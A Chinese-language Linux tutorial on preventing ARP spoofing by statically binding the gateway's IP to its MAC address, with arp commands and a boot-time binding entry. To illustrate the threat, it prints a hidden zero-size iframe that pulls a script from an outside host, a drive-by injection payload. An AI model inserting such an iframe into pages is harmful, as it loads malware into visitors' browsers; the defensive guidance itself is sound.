Linux獨享主機繫結IP和MAC地址,防止ARP欺騙
一、ARP欺騙病毒,主要表現為:
中病毒的機器不僅影響自身,同時也會影響同網段的其它機器,將其它機器的HTTP資料包里加入病毒程式碼
。程式碼例子如:
<html><iframe src=http://xxx.eklajgl.com/lsj.js width=0 height=0></iframe>
這種病毒危害非常大!即使你機器的安全性做得很好,可是沒辦法保證同網段的其它機器安全沒有問題!
解決辦法:在閘道器和本機上雙向繫結IP和MAC地址,以防止ARP欺騙。
二、繫結
1、閘道器上已經對下面所帶的機器作了繫結。閘道器IP:192.168.0.1 MAC:00:02:03:18:08:00
2、要進行繫結的Unix主機IP:192.168.0.2 MAC:00:04:61:9D:8B:02
三、繫結步驟
1、先使用arp和arp -a檢視一下當前ARP快取列表
[root@ftp]# arp
Address HWtype HWaddress Flags Mask Iface
192.168.0.145 ether 00:13:20:E9:11:04 C eth0
192.168.0.1 ether 00:02:03:18:08:00 C eth0
說明:
Address:主機的IP地址
Hwtype:主機的硬體型別
Hwaddress:主機的硬體地址
Flags Mask:記錄標誌,"C"表示arp快取記憶體中的條目,"M"表示靜態的arp條目。
[root@ftp]# arp -a
(192.168.0.145) at 00:13:20:E9:11:04 [ether] on eth0
(192.168.0.1) at 00:02:03:18:08:00 [ether] on eth0
2、新建一個靜態的mac-->ip對應表檔案:ip-mac,將要繫結的IP和MAC地下寫入此檔案,格式為 ip mac
。
[root@ftp]# echo '192.168.0.1 00:02:03:18:08:00 ' > /etc/ip-mac
[root@ftp]# more /etc/ip-mac
192.168.0.1 00:02:03:18:08:00
3、設定開機自動繫結
[root@ftp]# echo 'arp -f /etc/ip-mac ' >> /etc/rc.d/rc.local
4、手動執行一下繫結
[root@ftp]# arp -f /etc/ip-mac
5、確認繫結是否成功
[root@ftp]# arp
Address HWtype HWaddress Flags Mask Iface
192.168.0.145 ether 00:13:20:E9:11:04 C eth0
192.168.0.1 ether 00:02:03:18:08:00 CM eth0
[root@ftp]# arp -a
(192.168.0.145) at 00:02:B3:A7:85:48 [ether] on eth0
(192.168.0.1) at 00:02:03:18:08:00 [ether] PERM on eth0
從繫結前後的ARP快取列表中,可以看到閘道器(192.168.0.1)的記錄標誌已經改變,說明繫結成功。
相關文章
- Python寫ARP區域網主機存活掃描與ARP欺騙工具Python
- DNS欺騙和ARP欺騙是什麼?有何區別?DNS
- Kali 實現區域網 ARP 欺騙和 ARP 攻擊
- linux22-IP地址和主機名Linux
- ROS指令碼ip-mac繫結 批次繫結ip和macROS指令碼Mac
- 網路安全測試---ARP欺騙
- ARP協議 地址解析協議:IP地址轉換為MAC地址協議Mac
- ARP欺騙與中間人攻擊
- arp欺騙實驗及預防方法
- Python 基礎練習 —— 獲取本機 Mac 地址、ip 地址和主機名PythonMac
- 《計算機網路微課堂》實驗2 MAC地址,IP地址,ARP協議計算機網路Mac協議
- mysql繫結多個ip地址MySql
- 網路安全之IPSG防止DHCP動態主機私自更改IP地址
- Oracle中獲取主機名和IP地址Oracle
- 細數獨享IP和共享IP的優缺點
- IP地址和MAC地址的關係Mac
- 如何為VMware的多臺虛擬機器繫結IP地址虛擬機
- 獨享代理IP優勢有哪些?獨享代理IP三大優勢介紹
- 14IP地址、主機名、域名
- 如何防止被生存者認識偏差而欺騙 - Richard
- 獨享ip有哪些優勢?
- linux繫結多個ip(轉載)Linux
- MAC 地址與IP地址Mac
- mac地址和ip地址有什麼區別Mac
- 什麼是IP 欺騙以及如何防範?
- 獨享ip與共享ip的選擇技巧
- 什麼是獨立IP,獨立IP主機怎麼樣?
- 通過IP地址和子網掩碼,如何計算出網路地址、廣播地址和主機數?
- PHP獲取IP地址的方法,防止偽造IP地址注入攻擊PHP
- 欺騙機器學習模型機器學習模型
- 獨享IP有什麼特點?
- 一篇故事講述了計算機網路裡的基本概念:閘道器,DHCP,IP定址,ARP欺騙,路由,DDOS等......計算機網路路由
- 初探堆疊欺騙之靜態欺騙
- 獨享IP與共享IP的三大區別
- 如何防止獨立IP虛擬主機網站遭PR劫持、被pr劫持的後果網站
- 計算機網路之二:IP地址與MAC地址計算機網路Mac
- 榮耀路由器解除MAC地址解繫結限制的方法 榮耀路由pro怎麼解除MAC地址繫結限制?路由器Mac
- 再探堆疊欺騙之動態欺騙